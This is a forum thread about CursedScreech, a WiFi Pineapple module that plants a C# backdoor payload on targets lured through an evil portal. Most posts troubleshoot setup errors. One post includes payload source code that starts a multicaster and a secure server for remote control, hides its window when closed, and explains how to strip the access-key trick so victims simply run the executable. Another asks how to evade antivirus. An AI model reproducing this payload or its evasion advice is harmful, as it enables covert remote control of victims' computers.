Jump to content
sud0nick

[Official] CursedScreech

Recommended Posts

On 7/11/2018 at 6:11 PM, Ramez said:

I was finally able to find the solution! Apart from everything else I did above, you need to add the 'targetlogs' folder to the follow directory: /pineapple/modules/CursedScreech/includes/forest

It looks like for some reason the new firmware updates have been causing issues where the 2 folders (keys & targetlogs) do not get created automatically. Anyway, hope this helps!

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

Share this post


Link to post
Share on other sites
1 hour ago, sud0nick said:

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programatically instead.

Share this post


Link to post
Share on other sites
1 hour ago, Sebkinne said:

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programatically instead.

Yeah, it's my fault for not checking for their existence in the first place.

Share this post


Link to post
Share on other sites

I really appreciate the payload you have provided with the cursedscreech module, but I was just wondering, are there any other payloads out there that don't involve having to put it in an access key? In other words, the victim just has to download the executable file and run it, instead of having to do the whole generate access key thing. I've looked everywhere but can't seem to find any pre-configured payloads for the pineapple.

Share this post


Link to post
Share on other sites

@Ramez when you generate the payload in Visual Studio just don't include the PA_Authorization class.  Here's an example:

using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;

namespace Payload
{
	public partial class Form1 : Form {
    
      	// ***************** REMOVE THIS LINE *****************
		PA_Authorization pauth = new PA_Authorization();
      	// ***************** REMOVE THIS LINE *****************
	
		public Form1() {
			InitializeComponent();
	
			CursedScreech cs = new CursedScreech();
			cs.startMulticaster("231.253.78.29", 19578);
			cs.setRemoteCertificateSerial("EF-BE-AD-DE");
			cs.setRemoteCertificateHash("1234567890ABCDEF");
			cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
		}
		private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
			e.Cancel = true;
			this.Hide();
		}
      
      // ***************** REMOVE THIS FUNCTION *****************
      
		private void accessKeyButton_Click(object sender, EventArgs e) {
				
			// Request an access key from the Pineapple
			string key = pauth.getAccessKey();
	
			// Check if a key was returned
			string msg;
			if (key.Length > 0) {
				msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
			}
			else {
				msg = "Failed to retrieve an access key from the server.  Please try again later.";
			}
			
			// Display message to the user
			MessageBox.Show(msg);
		}
      
      // ***************** REMOVE THIS FUNCTION *****************
	}
}

The authorization function is just a trick anyway.  There's no real dependency on the access key for Cursed Screech.  However, the Payloader injection set in Portal Auth does require the access key to allow a target through Evil Portal.  Maybe in the future I'll add a Payloader injection set that doesn't require the access key but for now you'll have to remove that functionality yourself.

Share this post


Link to post
Share on other sites

first of all, thank you for the amazing support you have been giving. i do have a quick question. My target downloads and runs the payload fine, but although it shows up in de serverlog, Sein cant seem to make a connection. It never turns up in the target list in CursedScreech. does anyone have any idea's why??

Share this post


Link to post
Share on other sites
11 hours ago, display-names said:

first of all, thank you for the amazing support you have been giving. i do have a quick question. My target downloads and runs the payload fine, but although it shows up in de serverlog, Sein cant seem to make a connection. It never turns up in the target list in CursedScreech. does anyone have any idea's why??

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Share this post


Link to post
Share on other sites
11 hours ago, sud0nick said:

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

Share this post


Link to post
Share on other sites
16 hours ago, display-names said:

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Share this post


Link to post
Share on other sites
7 hours ago, sud0nick said:

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Well, i only have the option to set it to br-lan, i do have the most up to date version though. i will just try to reinstall the module i guess. but just in case, any idea's why i cant set my Sein interface to anything except br-lan?

 

EDIT 1: reinstall didnt help, too bad

Sein.png

Edited by display-names

Share this post


Link to post
Share on other sites

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

Share this post


Link to post
Share on other sites
On 8/9/2018 at 2:58 AM, sud0nick said:

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

hey there, i have tried to get it to work, but no luck, did you have any more luck?:)

Share this post


Link to post
Share on other sites
On 8/10/2018 at 3:41 PM, display-names said:

hey there, i have tried to get it to work, but no luck, did you have any more luck?:)

Hi there,

I had the same problem. 

i studied the code (PinappleModules.cs) and found out that in "startMulticaster" in the while loop it set the "localIP" as wrong interface. so i had to disable the interface accordingly in the adapter settings - after all it chose the right interface. 

Share this post


Link to post
Share on other sites

I'm looking for a way to crypt the payload that I build with visual studio to avoid detection
help me thanks

Share this post


Link to post
Share on other sites
On 5/6/2019 at 11:35 AM, fan said:

I'm looking for a way to crypt the payload that I build with visual studio to avoid detection
help me thanks

You want to encrypt the payload for transmission only or while it's on disk too?  If you encrypt it on disk to bypass AV you won't be able to execute it.  To run it you would need to decrypt it and at that point AV would get you anyway.  The point in providing an API for this module is to allow you to create your own payloads and work around AV however you choose.  You could possibly obfuscate your code but I don't think encryption is what you want.

Share this post


Link to post
Share on other sites
Thanks for the answer, how can I use your payload to create another to bypass av. There is a video tutorial to learn how to do this.
Any information on this subject would be appreciated
 

Share this post


Link to post
Share on other sites

Already messaged Nick, but figured I would post a reply to this topic to see if anyone else might have some insight.

I have downloaded the module on a freshly fac-resetted pineapple that has had the firmware upgrade. I ran opkg update and got the depends installed.
Tried to get everything running after using papers to generate certs and created a C# payload, but Sein will not start. I checked the backend and it was yelling at me about ssl module for python, got pip, installed ssl, and still nothing.

Pretty confused at this point.

Share this post


Link to post
Share on other sites
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton

Is what I am getting when I try to run it manually from the back end.

Share this post


Link to post
Share on other sites

Hi there,

When I try to start kuro, the following entries appear in the Acitivity log:
[+] Starting Kuro...
[>] Cleaning up sockets

Then it ends kuro and I cannot send any commands. in PortalAuth under payload the target is visible. 
I'm afraid I don't know how to fix this at the moment. Can anyone help?

Thank you.

 

Share this post


Link to post
Share on other sites

Version 1.6 is now available on GitHub!  A PR has been submitted to the master repo.

Here is the changelog:

December 26, 2019

- Fixed bug in latest firmware that saved module settings in an invalid state causing issues when running Sein.

 

Share this post


Link to post
Share on other sites
On 10/18/2019 at 11:00 PM, cr4nk said:

root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton

Is what I am getting when I try to run it manually from the back end.

Exact same problem that I've gotten! Is there any solution for this?

Share this post


Link to post
Share on other sites

Hey everyone, I've decided that I'm not going to maintain this module any longer.  My reasons are similar to those I posted in the PortalAuth thread but also because the techniques used in this old module are no longer effective.  The payloads are caught pretty easily by AV now, even Windows Defender!  I think it's time for this module to ride off into the sunset.

As for the current issues poeple are facing with sein.py:

socket.error: illegal IP address string passed to inet_aton

This is probably because you haven't updated the interface setting from the module yet.  You should select an interface and click the save button which will update the settings.  You can also check /pineapple/modules/CursedScreech/includes/forest/settings to verify the correct IP address is set.  You may have my Pineapple's local IP in there (192.168.0.138) which is throwing the exception.

Share this post


Link to post
Share on other sites

my Pineapple is just dead meat, seems like its dead for a while now... seems like the product and most importently the cummunity is no longer there... wake up HAK5 😓

 

JMX

Share this post


Link to post
Share on other sites
Posted (edited)
8 hours ago, JediMasterX said:

my Pineapple is just dead meat, seems like its dead for a while now... seems like the product and most importently the cummunity is no longer there... wake up HAK5 😓

 

JMX

"Dead meat" is not a very diagnostic description.  What have you done to it? How did you attempt a reset?  Don't tell people to wake up if you can't really articulate what is going on.  Look at the reset process.  Follow it.  Make sure it is powered properly according to the documentation. Start following the process exactly.  Attempt to access it (and explain what happened), then if that doesn't work, follow the reset process.  Never expect people to care what you write when you didn't write anything descriptive yourself. That is important to any community.  

Edited by Struthian

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...